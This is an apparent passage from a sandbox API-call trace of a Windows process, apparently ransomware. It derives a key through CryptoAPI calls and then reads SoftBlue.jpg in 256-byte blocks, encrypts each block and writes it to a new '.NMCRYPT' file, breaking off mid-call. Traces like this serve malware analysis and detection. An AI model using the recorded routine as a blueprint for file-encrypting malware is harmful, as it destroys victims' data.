[0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.799] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.799] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0165.799] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.799] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad278) returned 1 [0165.799] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.799] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.799] wcslen (_String="\\\\?\\") returned 0x4 [0165.799] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2b8) returned 1 [0165.799] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0165.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0165.800] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=10569) returned 1 [0165.802] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.802] GetLastError () returned 0x0 [0165.802] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.087] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.087] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.087] GetLastError () returned 0x0 [0166.087] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.088] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.088] GetLastError () returned 0x0 [0166.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.088] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.088] GetLastError () returned 0x0 [0166.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.088] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.088] GetLastError () returned 0x0 [0166.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.088] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.088] GetLastError () returned 0x0 [0166.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.088] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.088] GetLastError () returned 0x0 [0166.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.088] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.088] GetLastError () returned 0x0 [0166.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.089] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.089] GetLastError () returned 0x0 [0166.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.089] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.089] GetLastError () returned 0x0 [0166.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.089] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.089] GetLastError () returned 0x0 [0166.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.089] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.089] GetLastError () returned 0x0 [0166.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.089] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.089] GetLastError () returned 0x0 [0166.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.089] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.089] GetLastError () returned 0x0 [0166.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.090] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.090] GetLastError () returned 0x0 [0166.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.090] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.090] GetLastError () returned 0x0 [0166.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.090] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.090] GetLastError () returned 0x0 [0166.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.090] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.090] GetLastError () returned 0x0 [0166.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.090] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.090] GetLastError () returned 0x0 [0166.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.090] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.090] GetLastError () returned 0x0 [0166.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.091] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.091] GetLastError () returned 0x0 [0166.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.091] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.091] GetLastError () returned 0x0 [0166.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.091] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.091] GetLastError () returned 0x0 [0166.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.091] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.091] GetLastError () returned 0x0 [0166.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, 